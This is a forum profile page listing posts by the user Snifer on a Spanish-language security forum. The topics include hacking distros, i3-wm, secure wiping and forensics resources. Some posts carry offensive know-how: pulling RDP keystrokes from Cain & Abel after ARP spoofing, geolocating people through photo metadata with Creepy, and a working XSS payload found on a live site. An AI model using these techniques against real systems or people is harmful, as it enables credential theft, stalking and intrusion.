Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Snifer

#1
Off Topic / Antrax esto te gustara! nena!!!
Septiembre 29, 2015, 01:47:36 AM
Antes de que me vengas a joder con el titulo del post esto te agradará ;).



Regards,
Snifer
#2
Underc0de / Reporte de links rotos
Noviembre 02, 2014, 12:11:17 AM

Hola a todos, dejo este post para que entre todos colaboremos a mantener limpio y ordenado el foro.
Pueden reportar imagenes rotas, links caidos o posts mal hechos para que sean arreglados o eliminados por algun moderador.

Solo dejen el link del post defectuoso en este mismo post para que sea moderado.

Saludos a todos y muchas gracias por colaborar!
#3
Hola a todos esta entrada es de mi blog, cabe resaltar que ando realizando una mofa referente al término Hacker, ya que todo mundo lo usa,  y se autonombra ;), a los que entienden ello saben que opino pero bueno espero les agrade y ver sus comentarios.




Hace tiempo que no doy mi punto de vista de algún tema o aún relacionado a desarrollo y hacking, el motivo del título de la entrada del dia de hoy es porque vi en varios lugares la misma pregunta orientada de diferente manera, pero al final lo que logro comprender de esas pregunta es:


¿Que lenguaje de programación me recomiendan para ser Hacker? Me dan la formula secreta del hacking? cuando veo esto me recuerdo a Planktom! de Bob Toronja, la formula quiero la formula!!!!

Hace tiempo ya di mi punto de vista sobre que SO Linux usar para ser Hacker, para aprender seguridad informática, Todos los cursos son con backtrack o Kali como también el Windows Linux o Mac, (realizado en Underc0de) cual me permite convertirnos en megakuackers así que en esta daré mi punto de vista sobre ello los lenguajes de programación.

Para seleccionar un lenguaje de programación y tener buenas bases de lógica y conocimiento de ello, en lo persona recomiendo C/C++ ya que es el padre de los lenguajes y con el aprenderán mucho mas que con el resto, pero en otro bando si desean aplicar en el área de seguridad informática en base a realizar sus propias herramientas, pues yo como evangelizador y me pongo la capa de FanBoy!! Python les recomiendo porque les daré las mil ventajas:

- Es un bonito lenguaje.
- Es amigable.
- Multiplataforma.
- Hackearas servidores en un minuto.
- Sirve para análisis de redes, parámetros hexadecimales.
- Te permitira relacionarte con entes del 3 mundo.

¿Seguimos o paro ahí?


Aquí esta el detalle, principal si realizan esas preguntas siempre habrá el evangelizador que le dirá segun su conocimiento que lenguaje elegir aquí ya depende de usted seguir lo que diga dicha persona que por cierto no quiero indicar que todo lo hagan de mala fe, si no lo contrario lo que indican es por su cariño que tienen con el lenguaje y la experiencia desarrollando en el, llegara hasta ofrecerte el cielo y las estrellas en el lenguaje aunque este caso no se de así.

Entonces que hacer o que no hacer, que lenguaje es la formula secreta? no existe dicha receta cada uno tiene que armarla decidir porque lenguaje tomar  el camino, sea PHP, Perl, Python, Ruby, C# o cualquier otro depende de cada uno primero para adquirir la pericia de automatizar lo necesario, ojo que antes es necesario que sepas como se hace que pasos realizar asi se te será mas fácil realizar cualquier programa, comentarles que cada programa tiene su fuerte, así que en cualquiera se puede hacer maravillas.

Cada quien alabará donde mejor se maneje aquí una viñeta desde el Baul del Programador, que resume un poco lo que les quiero decir.


Bueno espero que con esta breve entrada logren comprender que nadie les dará una receta para ser Juackers cada uno de ustedes debe de buscar su propio camino y aprender mas que todo por su sed  de conocimiento y no por tener fama ni ser hackStar ;) espero me comprendan los que inician y decirle feliz codding ;).

Ahhh no se olviden si son programadores tendrán la perfecta excusa para no trabajar ;) !!!



Regards,
Snifer

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
Off Topic / Feliz cumple F0m3t regla!!!
Octubre 15, 2014, 07:13:47 PM
Bueno hoy el cumple del niño f0m3t que se hace hombre! un abrazo bro un feliz cumple desde Bolivia te deseo lo mejor...



Regards,
SNIFER
#5
Python / Canal en Youtube de Hacking con Python
Octubre 11, 2014, 04:48:32 PM

Este es un canal en Youtube, relacionado a "Hacking con Python" dedicado totalmente a los videos de Adastra si les hablo del autor del sitio Thehackerway, en el cual nos brinda un gran acercamiento al uso de Python en el área de la seguridad informática, dando todo su conocimiento a favor de la comunidad  se preguntaran porque rayos subió los videos si están disponibles en el sitio de Adastra la respuesta es la siguiente:



CitarMe molestaba poder verlos con flash instalado como requisito, llevaba dias tratando de bajar los videos para verlos offline, y en una de esas pude, y con el permiso del autor los subí.


Espero les agrade.

Regards,
Snifer
#6
Quien no hizo uso de la herramienta CAIN & ABEL  mas conocido como CAIN, desarrollada por Massimiliano Montoro dicha herramienta se encuentra en la versión 4.9.56 actualizado recientemente este año por si no lo conocen es  una herramienta para la recuperación de contraseñas, sniffing hacking wifi, fuerza bruta, decoder de múltiples protocolos, envenenamiento de tablas ARP,  en realidad es un TEU de Hacking el cual se encuentra disponible para descargar de manera gratuita de su página Oficial. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a continuación saco las carácteristicas de  la herramienta de su página en Wikipedia.

Características de CAIN & ABEL


    Crakeo WEP
    Aceleración de la captura de paquetes mediante inyección de paquetes
    Capacidad para grabación de conversaciones VoIP
    Descifrado de contraseñas seguras
    Calculadora de hashes
    Traceroute
    Revelación de boxes de contraseñas
    Descubrimiento de cached passwords
    ARP Spoofing
    Resolución de IP a MAC Address
    Sniffer de contraseñas de red
    Dumper de LSA
    Capacidad para crackear:
        Hashes LM y NTLM
        Hashes NTLMv2
        Microsoft Cache hashes
        Archivos Microsoft Windows PWL
        Hashes Cisco IOS - MD5
        Hashes Cisco PIX - MD5
        Hashes APOP - MD5
        Hashes CRAM-MD5 MD5
        Hashes OSPF - MD5
        Hashes RIPv2 MD5
        Hashes VRRP - HMAC
        Virtual Network Computing (VNC) Triple DES
        Hashes MD2
        Hashes MD4
        Hashes MD5
        Hashes SHA-1
        Hashes SHA-2
        Hashes RIPEMD-160
        Hashes Kerberos 5
        Hashes de clave compartida RADIUS
        Hashes IKE PSK
        Hashes MSSQL
        Hashes MySQL
        Hashes de Bases de datos Oracle y SIP


Ahora tras esta breve introducción sobre la herramienta nos vamos al porque del titulo de la entrada, no explicare la instalación ni como se hace el proceso de envenenamiento de las tablas ARP, (MitM hombre del medio, ip Spoofing) si no explicaré el tip que acabo de descubrir sobre la obtención de credenciales del protocolo RDP.

Bueno tras haber realizado el un ARP Spoofing (o ARP Poisoning), en el segmento de red donde realizamos la prueba,  notaremos que nos marca en negrita APR-RDP seguida de un valor en mi caso 23.

Tras realizar el click observamos los datos de las sesiones capturadas, tras esto le damos click derecho y view como se muestra en la siguiente captura.



Tras realizar dicha tarea nos abrira con el bloc de notas, si nos ponemos a revisar la captura obtenida entendemos algo? Dense su tiempo para analizar y encuentren la contraseña :).


La verdad es mucha cosa por revisar,  y tocaria ir revisando hexadecimal y demas :|  asi que haremos lo siguiente abrimos una cmd y nos dirijimos a "C:\Program Files (x86)\Cain\RDP\" y nos posicionamos en dicha carpeta.


Ahora si analizamos los nombres de los *.txt  tienen una estructura que llama bastante la atención ya que comienza con RDP - Año+Mes+Fecha+Hora:min:Seg teniendo un resultado como el siguiente
RDP-20141006195537218.txt

Lo que corresponde es realizar la busqueda de la cadena "Key pressed" con ello obtener las pulsaciones del teclado como si de un keylogger se tratase.


Mitigar la vulnerabilidad o reducirla, es un objetivo que se debe de tener en el caso de sufrir estos tipos de ataques, por lo cual se puede hacer uso de una VPN entre los dos puntos de comunicación.

La verdad este tip o truco como lo quieran llamar recien lo aprendi ayer, ya que la necesidad lleva a algo, espero les sirva y si conocen algun otro tipo de mitigación porfavor hacerlo notar asi aprendemos.

Regards,
Snifer


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#7
Hacking / HackStory en formato Epub
Agosto 26, 2014, 12:12:20 PM
Hola a todos,


Esta vez vengo con buenas noticias no se si saben sobre HackStory ? si no lo saben dense una vuelta por su sitio oficial, ya vieron de que se trata? ahora si Merce tuvo la gran idea de hacer publico en formato epub todo el contenido de su investigación por lo cual ahora les traigo, la forma de descarga  y donde obtenerlo lo primero tenemos disponible por medio de Torrents o bien en descarga directa.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Regards.
Snifer
#8
Off Topic / Un gusto me retiro!
Julio 31, 2014, 04:42:53 PM
Hola a todos,

Esta entrada es para indicarles a todos de la comunidad que me retiro ya estoy cansado de ver tanta gente que no sabe usar google :| ni hacer una busqueda simple es enserio?....

Asi que viendo esto me retiro el dia de hoy y espero mañana regresar y no ver tanta weba :|.

Regards,
Snifer
#9
GNU/Linux / I3-wm - Conociendo sobre I3-WM
Mayo 10, 2014, 10:27:31 PM
Esto lo traigo para que don Antrax conosca mas del mundo Linux... el porque leanlo..

Cita de: Skype
[9:15:32 PM] ANTRAX: que lindo es usar Linux!
[9:15:41 PM] Jose - Snifer: es sepsi aun mas usar
[9:15:43 PM] Jose - Snifer: a mi manera :D
[9:15:44 PM] ANTRAX: bendito el dia en que me pasé
[9:15:45 PM] Jose - Snifer: con i3
[9:15:56 PM] ANTRAX: yo tengo un i7

Bueno debi especificar i3-wm por lo menos pero que va lo traigo en los proximos dias ire armando el resto de las entradas,


Hace un par de semanas atras migramos hacia i3-wm en mi nuevo estimado Manjaro, tanto asi que me puse a realizar un repositorio en GitHub donde ando subiendo las modificaciones que voy realizando a Manjaro desde la modificación del xinitrc.

¿Que es I3?

i3 es un gestor de ventanas de tipo mosaico, escrito completamente desde cero. i3 se creó porque wmii, el gestor de ventanas del que procedía, no proporcionaba algunas características útiles (compatibilidad multi-monitor, por ejemplo) contenía algunos errores, poco progreso en su desarrollo y no era fácil mejorarlo en absoluto (al carecer por completo de comentarios y/o documentación del código fuente).

Diferencias notables de i3 son las áreas de soporte multi-monitor y la distribución del árbol. Para la velocidad de la interfaz de Plan 9 wmii no está   implementada
Lo que caracteriza a i3 es que no se hace uso del mouse, en lo posible solo el teclado ademas usando en su totalidad la pantalla el espacio de trabajo.
Un ejemplo podemos ver en la siguiente imagen, donde tengo abierto Terminator


Y aqui el navegador conjuntamente con 2 terminales abiertas.


El uso de estos escritorios es salir de lo normal es decir, sale del usuario normal evitando tener varias ventanas en un mismo lugar la barra de tareas estando totalmente limpia donde anda dicha barra? vean abajo de la captura anterior.

Paradigma es hacer uso de areas de trabajo, o escritorios virtuales haciendo uso de mas de 2 o 3 escritorios virtuales haciendo uso de cada uno para una tarea específica es decir.


  • Escritorio 1 -> Navegador Web
  • Escritorio 2 -> Pdf
  • Escritorio 3 -> Multimedia
  • Escritorio 4 -> Desarrollo
  • Escritorio 5 -> Game

La ventaja de este metodo de configuración por decirlo es que podemos configurar que cierta aplicación vaya especificamente a un escritorio.
Del mismo modo podemos hacer que vayan en pestañas en solapas por asi decirlo con la tecla comodin (que segun la configuración inicial puede ser la desconocida windows o Alt) + w y para quitar windows + e.

Notificaciones por medio de una notificación xD redundante pero cierto.

La instalación de i3 es simple y fácil basta con irnos a la terminal y ejecutar según nuestro gestor de paquetes.

i3-wm


A continuacion les dejo el cheat sheet del manejo con el teclado.

Keys to use with $mod (Alt):


Keys to use with Shift+$mod:


En la proxima entrada iremos destripando a fondo a i3, configurando  enchulandolo y adicionalmente iremos con aplicaciones de consola netamente para el uso con i3 ;) ya veremos con que salimos.

Mientras tanto el mejor manual para seguir la página oficial  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta por si no tenian conocimiento al andar en Manjaro tuve que modificar el xinitrc, en ese proceso de andar googleando y revisando un poco, recien di con el proyecto No tienes permitido ver los links. Registrarse o Entrar a mi cuentaque ya anda con i3 configurado, lo andare revisando y viendo que anda por ahí.

Regards,
Snifer

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
GNU/Linux / ¿Como crear paquetes .deb? dpkg -i
Mayo 10, 2014, 10:05:03 PM

¿Cómo crear paquetes .deb? como portar mis programas no seria mas facil un .deb dpkg -i y tenerlo a mano, o bien compartir algun proyecto que tenemos y deseamos que el resto este beneficiado, pues anduve en estos lares revisando para sacar un .deb de grampus y en su momento salio a la luz en HDMagazine, pero nunca lo lleve a cabo :| por falta de tiempo no hubo tiempo para apoyar en su totalidad a la ORCA asesina.....

Me olvide por todo este tiempo sobre esos post hasta que nuevamente el día Miercoles Eugenia lanzo un tweet donde compartía sus publicaciones así que vino nuevamente el bichito de debianizar.

Ahora los enlaces de descarga y ver, si puedo hacerlo luego:

    Cap I: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
    Cap II: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
    Cap III: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Regards,
Snifer

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#11
Esta entrada la realize por mas que razones obvias tras la primera entrada que es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta esta en mi blog comenzo el trolling y ataques de capa 9.


Ahora si señores ando medio, Shaolin xD por decirlo porque veo que algunas personas aun tienen ese pensamiento de que si el se lanza al pozo yo también lo hago, es decir con todo respeto no quiero que se tomen de malas con mi persona, mediocridad nivel máximo al creer de esa manera.

Los que siguen en el blog estoy seguro que vieron la entrada de ayer que era ¿Cual Backtrack, Kali, Bugtraq,Backbox o BlackArch y otras hierbas para aprender hacking ? si no la vieron los invito para que la lean :), y de ahí saquen ustedes mismo sus propias conclusiones como también comenten en esta entrada si no les agrada, todo comentario es aceptable. El motivo de esa entrada fue para dar a conocer mi punto de vista y sorprendetemente vino el comentario de una persona con el nombre de lorenzo el cual pone lo siguiente en la entrada:



Si correcto todos los cursos, tutoriales las hacen con Kali o Backtrack como lo vean pero eso no quiere decir que no se pueda trabajar o hacer lo mismo en otra distribución linux,  y que mas hasta me atrevo a decir desde un Windows o MAC no sera con las mismas herramientas en estos dos últimos pero todo es fácilmente viable y moldeable para ser usado a nuestra conveniencia.

El termino de parásito, me refiero a tener todo mascado servido y ser flojos, esto no va de esa manera porque no aprender nosotros mismos a hacerlo, dar la vuelta a la rueda y hacer otra receta, como se basa el software libre modificar a tu antojo para que cubra tus necesidades.

Todos hacen uso de estas distribuciones en cursos, certificaciones y demás me dirá mas que uno es cierto, pero porque lo hacen ? fácil y simple la respuesta desde mi punto de vista, un ejemplo, cuando doy capacitaciones de seguridad, prefería usar Backtrack por la comodidad de las herramientas que ya vienen configuradas, precargadas solo era hacer algunos retoques, si se desea que trabaje de alguna manera especial, luego de ello ya listo para hacerlo y no perder el tiempo en configuraciones. Esta es la razón que se hace uso de ello pero si deseamos aprender mejor hacerlo todo nosotros mismos.

Ahora en este punto les dejo a su criterio, desean tener una mejora continua en sus conocimientos, o quedarse varados con lo que ven en cursos y demas?


Cada uno decide que hacer, y mejor ver ambos lados de la cara de la moneda, con la entrada no quiero decir que no son buenas una u otra solo que mejor aprender y experimentar.


Regards,
Snifer
#12
La presente entrada la traigo de mi Blog debido a que nuevamente ando viendo lo mismo que detallo en la entrada, del mismo modo tenemos una entrada de Windows o Linux :).


Últimamente ando viendo esas preguntas en los foros donde participo, es por ello que escribo este post en el cual doy mi punto de vista en que distro es mejor para aprender sobre Hacking.

Cual de todas estas distribuciones es mejor?

Si nos vamos a simpleza, automatización y tener todo listo para aprender cualquiera de ellas, cada una con su nivel de madurez respectivo, como tambien un punto a favor cada uno que tiene la adaptabilidad, cantidad de herramientas como deseen.

En lo personal no llegue a usar nunca todas las herramientas que vienen con estas distribuciones específicamente BackTrack, Kali, Bugtraq mil veces prefiero tener lo que necesito a mano y ya que es el caso de Backtrack que modifique algunos enlaces y todo lo tenia de mano para lanzarlos cuando los necesite.

Actualmente ando en Debian con KDE en mi pc personal, y saben que! esta es mi distro para Hacking, para aprender  y joder mis cosas, así de simple la distribución que elijan no harán que se conviertan en Hackers mas todo lo contrario ustedes vuelven a la distribución única.

Conozco a un Fedorero (usuario de Fedora) que igual anda con sus herramientas juackers en su distribución así que no hay escusas.

¿Windows Linux o Mac?

Con cualquiera de ellos puedes hacer lo que tu desees todo depende de ti, necesitas Python, Bash, Perl en ellos instalalos, seguro que si se puede o se tiene una forma para poder utilizarlos nada es difícil.

Mas detalles el siguiente post No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aunque falta MAC :p

¿Necesito lo que tiene esa distribución NMAP, Metasploit y esa herramienta que bota correos?

Si necesitas dichas herramientas o cualquier otra porque no buscas  como instalarla :) no crees que así aprenderás mas de la cuenta, y veras como trabajan dichas herramientas por detras, sera moroso talvez quizas a veces ni a la primera logres instalarlo pero vamos que en base de prueba y error se aprende.

Por ello les diré lo siguiente dejen de andar diciendo que distribución es mejor! o no, ustedes mismos metan mano y aprendan... y porque no programen cada uno de ustedes su herramienta :)

Regards,
Snifer

Fuente: Snifer@L4b's
#13

Energizando mas al pequeño Droide, ahora con anmap lo cual es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta desde nuestro Android el proyecto ya se encontraba desde el 2011 pero mis dichosos ojos recién lo conocieron aun mas ahora me servirá de mucho ya que lo usare en el trabajo, como veran en la captura siguiente tenemos una interfaz simple y sencilla para hacer uso de el, ya que ando conectado en casa me puse a hacer un scan a un equipo de la red teniendo  como resultado.


Para poder validar el scanneo que realizo anmap realize desde la pc lo cual como pueden ver me dio el mismo resultado.


Para hacer un reconocimiento desde el movil con anmap puede servir  ya que llegamos a pasar desapercibidos.


Para poder descargarlo nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y bajamos el *.apk o bien podemos realizar la descarga por medio del QRcode y tenerla lista!


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#14


Hace tiempo indique la posibilidad de crear, tutoriales basandonos con las herramientas de la distribucion Bugtraq tratare de crear uno diario, y llevandolo un poco mas a la practica, los mismos con PoC.




Esta vez venimos con una herramienta, la cual nos sirve para descubrir información, esta vez usando como un vector de ataque las fotos que subimos a las redes sociales para poder obtener la geolocalización del mismo de donde fue tomado, el uso depende de nuestra imaginación.


Primero Creepy se encuentra desarrollado en Python, lo cual lo vuelve una herramienta multiplataforma, pudiendo usarla en entornos Unix como en Window$,  cuyo objetivo es ir por las redes sociales y servidores de alojamiento de imagenes para poder obtener la información de los metadatos, que son agregados ya sea por un error humano que no, nos damos cuenta de ello o bien viene por defecto activado en gran parte de las aplicaciones que usamos en los celulares.

Creepy interactua directamente con:


  • Google Maps
  • Virtual Maps
  • Open Street Maps

Teniendo como principal fuente de informaciòn para poder visualizar y enlazarse directamente con ellos, teniendo un cuenta mas de la relacion de Creepy y sus funcionalidades tenemos las siguientes:



Ubicación del tweet por medio de  Twitter
Coordenadas en Twitter  publicaciones desde el dispositivo móvil
Lugar (posicion geográfica) realizando la posicion adecuada por medio de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Información Geolocalización accesible a través de servicios de alojamiento de imágenes API
EXIF ​​de las fotos publicadas.


Redes sociales soportadas:



  • Foursquare
  • Gowalla


Servicios de alojamiento de imágenes soportados:

flickr - Información recuperada de API.
twitpic.com - Información recuperada de etiquetas EXIF ​y ​API.
yfrog.com - Información recuperada de  etiquetas EXIF.
img.ly - Información recuperada de etiquetas EXIF.
plixi.com - Información recuperada de etiquetas EXIF.
twitrpix.com - Información recuperada de etiquetas EXIF.
foleext.com - Información recuperada de etiquetas EXIF.
shozu.com - Información recuperada de etiquetas EXIF.
pickhur.com - Información recuperada de etiquetas EXIF.
moby.to - Información recuperada de la API y etiquetas EXIF.
twitsnaps.com - Información recuperada de etiquetas EXIF.
twitgoo.com - Información recuperada de etiquetas EXIF.

Ya que conocemos sobre la herramienta porque no vemos el uso de la misma....

Primero para poder instalarlo en tu distribucion Linux o bien en Windows seguimos los pasos de la pagina en GitHub de Creepy como a su vez podemos acceder a su código y contribuir en su desarrollo, en mi caso estoy usando Bugtraq la version KDE basada en Debian, que recien el dia de ayer termine de instalarla y hasta ahora anda de maravillas :).

Para acceder nos dirigimos a Bugtraq-II > Anonymity Investigation > Researcher



Y obtendremos la siguiente interfaz, donde en Twitter Username ingresamos el nombre de usuario de twitter y apartir de ello Geolocate Target !!!! Click.



Para poder probar la herramienta hice la prueba con mi usuario de twitter @sniferl4bs lo cual  llego a encontrar 5 fotografias en la red social :S no me acuerdo cuando ni como permiti ello -_-! pero sirve indica la cantidad de fotos encontradas a la vez la cantidad de tweets.



Esto nos puede servir ya en un lado mas maligno por asi decirlo todo depende de la imaginación y el uso de la herramienta que se le de, nos vemos mañana!.


PD: 06-04-2013  Versión deprecada, es necesario actualizar a la nueva version que salio en la pagina de los autores.
Regards,
Snifer
#15
Hola gente que tal ando de nuevo por el foro ahora andaré mas activo quería realizarles una consulta, encontré un xss en un site el cual es el siguiente:

Código: xml
t.php?action='"()&%1<ScRiPt >prompt(1111)</ScRiPt>


Ahora  bueno luego de ello todo bien lo quiero hacer con caracteres y el vector no me da mas, bueno a ello me puse a jugar y revisar un poco, asi que di con algunas soluciones las cuales crei haber solventado pero no las pruebas y las opciones de solucion halladas fueron las siguientes teniendo como referencia OWASP:

Código: text
document.write(String.fromCharCode(cadena en ascii));


Del mismo modo enviando entre /caracter/ Algunas sugerencias o algo lo cual pueda llegar a leer?


Regards
Snifer


#16
Informática Forense / I Mini Reto - Criptográfico
Febrero 10, 2013, 10:34:06 AM
RetoViernes - Reto Criptografico I
Buenos dias Underc0de este reto lo traigo de mi Blog, el cual es un reto Criptográfico cada viernes ire trayendo uno nuevo, sin mas que decir realizo el copy paste  8)





Buenas a todos cada viernes antes de terminar el día estaremos con Retos en el Blog los cuales seran lanzados por la noche, ando pensando que serán criptograficos, esteganografia, Forense como el que lanze en Underc0de ya veremos pero la idea de estos es poder compartir conocimiento y ademas de ellos retarnos a nosotros mismos :).

Reglas:

1.- Enviar un correo a snifer[at]h-sec[dot]org en el caso del foro enviarme un MP :)
2.- En el correo indicar como lograron pasar el reto, que necesitaron para ello.
3.- Si gustan pueden enviar un informe técnico por así decirlo, al correo para poder incorporar en la solución que entregare, en la próxima solución.


Problema:

Tenemos el siguiente mensaje que recibimos en Snifer@L4b's no sabemos que es ni que se refiere solo fue enviado por la resistencia, en un correo indicando como titulo este mensaje.

FXJXNRTYNJRJXPFXQFRTXQFRHMFIFXIJXFRLWJFTYPFQEE

Tu objetivo poder descubrir que tiene dentro de si este mensaje.

Podras hacerlo? Animense el Viernes doy la solución :D
#17
Conceptos de Sistemas Operativos Tanenbaum Español

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Sistemas Operativos Distribuidos-silberchats-ingles


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18

Un Cheat Sheet puede ser definido como un conjunto o agrupación de notas (comandos, instrucciones, parámetros, etc.) que sirven o se aplican como referencia inmediata para una determinada herramienta (software), lenguaje de programación, materia o procedimiento (técnica).
El siguiente Cheat Sheet proporciona diversas instrucciones de ejemplo sobre el uso de herramientas y técnicas relacionadas con el Análisis Forense Digital.


Contenido:

  • Mounting DD Images
  • Mounting NTFS DD Images
  • Imaging Systems
  • Integrity Checking
  • Sorter
  • Automated Forensic Data Collection
  • Recovering Data
  • Creating Timelines
  • String Searches
  • The Sleuthkit


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Este Cheat Sheet fué desarrollado y publicado por la SANS.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19

Cheat Sheets

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Documentación y Conceptos Básicos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Libros

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Informática Forense en Imagenes

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Informática Forense a Dispositivos Moviles


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Informática Forense en Redes

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Antiforensic


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Herramientas


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Este indice de temas se ira actualizando regularmente como a la vez la creacción de subsecciones en esta sección del Foro si el caso lo amerita, cualquier cambio o sugerencia hacerlo por MP.

Saludos :P
#20
Buenos días ahora si llego la hora del SPAM! asi que si soy banneado ni modo sigo con mi vida en la red y me voy a mi rincón, xDD hoy me la pase molestando a Antrax antes de esta entrada xD, jajajaj :P



Hace tiempo atras un amigo por la red me mando un link de borrado de datos del HD, la mejor forma de borrar un disco sin dejar rastro alguno para mi, es meterlo al agua y destrozarlo luego agarrar los pedazos y quemarlo como todo un loco ;).

No vengan a meter a HD_Breaker porfavor no tiene nada que ver con HD.


Cuando andaba con la tesis hace un par de meses atras estaba viendo el uso de dd  dcfldd y dc3dd para  poder obtener imagenes forenses, debidamente sin que sufra algun cambio o alteración la misma  por si quieres saber mas en este post de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta explica sobre el tema.

¿Que es el borrado Seguro?

Es borrar tus datos sin que puedan ser recuperados, asi de simple y sencillo por ningun medio puedan ser visualizados nuevamente.

¿Porque hacer un borrado Seguro?

El motivo de hacer un borrado seguro de datos puede darse, porque se tiene una empresa de desarrollo de software y es necesario que los empleados no lleven nada de información en los ordenadores memorias.

Queremos vender nuestra laptop, disco duro y debemos de eliminar todos los datos para que no puedan verlos.

Y demas motivos.. =) ... que ya vengan al caso...

Métodos para realizar un borrado seguro


Formateo Eliminación Tradicional

Cuando se hace un borrado con el comando rm, los datos borrados pueden ser recuperados lo que se hace es eliminar el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta).


¿Que es el Inode (Inodo)?

Si no vas al link de la wikipedia, ¬¬ eres un vago!! na mentira explicare lo mejor posible que es el inode.

El inode(inodo) es una estructura de datos, una tabla la cual contiene información sobre un fichero.


Figura 1

Los campos que lleva esta tabla son los que se ven en la Figura 1. esto quiere decir que si cambiamos un  archivo, el nombre se actualiza el inodo principal.

Existen copias en disco de los inodos que se actualizan regularmente podemos hacer uso de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  para actualizar las copias de los inodos, los cuales no se encuentran abiertos si no en (reposo).

Simplemente podemos saber con el inode a quien pertenece el archivo quien lo creo, el tamaño, la ultima fecha de acceso, modificación y eliminación. (Para fines forenses .... Ya ando por terminar algunos post para Underc0de y traerlos :) !!)

Destrucción Fisica


El mejor método como indique, agarrarlo a martillazos desestrezarnos completamente destruyéndolo haciendo que el medio quede inutilizable.


Electromagnetismo


Lo digo asi, pero el termino correcto es Degauss, que consiste en producir un campo electromagnético grande, que destruye la información. (Solo funciona con medios magnéticos), algunas leyendas urbanas dicen que se puede realizar por medio del microondas :P.


Sobre escritura por Software


Este borrado se realiza sobrescribiendo toda la información, reemplazándolo por datos aleatorios nulos sin sentido.

Para eso tenemos varias opciones en Linux los cuales son:

shred: Sobreescribe repetidas veces (25 por defecto).
wipe (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta):
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Esta herramienta proporciona varios comandos para borrado seguro:
- srm: archivos.
- sfill: espacio libre entre ficheros.
- sswap: swap.
- smem: RAM.
dd (data duplicator)

Así que la mejor forma de realizar un borrado de datos seguro es:

Usar wipe, luego proceder con el borrado físico.. así estamos mas seguros.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#21

Bueno este post lo traigo de mi blog ya que K43l andaba preguntando sobre un IDE para Python  asi que aqui vamos.




Si me preguntan un IDE para Python mi respuesta siempre es Gedit.

El porque digo porque llego a usarlo como un IDE haciendo algunas modificaciones, las cuales son pequeñas y permiten volver a Gedit un potente IDE asi del mismo modo como lo hice con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  usando el plugin para trabajar con el mismo.

Asi que ahora haremos lo mismo usando un plugin para hacerlo con Python  .

Primero procedemos a descargar el plugin de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y procedemos a copiar en la siguiente ruta ./home/snifer/.gnome2/gedit/plugins

Código: bash
sudo cp auto_completion.py /home/snifer/.gnome2/gedit/plugins


Ahora pasamos a irnos al gedit → Preferencias y activamos Autocomplementar.

Aqui comenzando un ejemplo y ya me permite autocomplementar..


Pero bueno solo nos autocomplementa o que ¬¬ bueno no me griten ni nada tenemos la oportunidad de que nos corrija si cometemos algun error para eso bajamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta copiamos en el mismo directorio en plugins y listo.


Como veran el buen Gedit hace una dupla estupenda con Python, nada que envidiar a otros jejeje

Saludos

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#22
Comento este simple método para realizar todo un backup de nuestro sistema GNU/Linux. La idea es simple, ya que sólo se encarga de crear un archivo comprimiendo con todo el contenido de nuestro /, excluyendo aquellas partes que no vale la pena o no conviene "backupear".


Esto me parece muy bueno para esos casos donde solemos meter mano en archivos del sistema, para así no perder nuestros cambios. Para hacer el backup, ya sea con sudo o como root, debemos crear una carpeta. Entrar en ella y entonces ejecutar el comando:


Código: text
mkdir backup

cd /backup

tar        cvpjf           backup.tar.bz2     –exclude=/proc       –exclude=/lost+found –                                exclude=/backup.tar.bz2 –exclude=/mnt –exclude=/sys / -exclude=/tmp


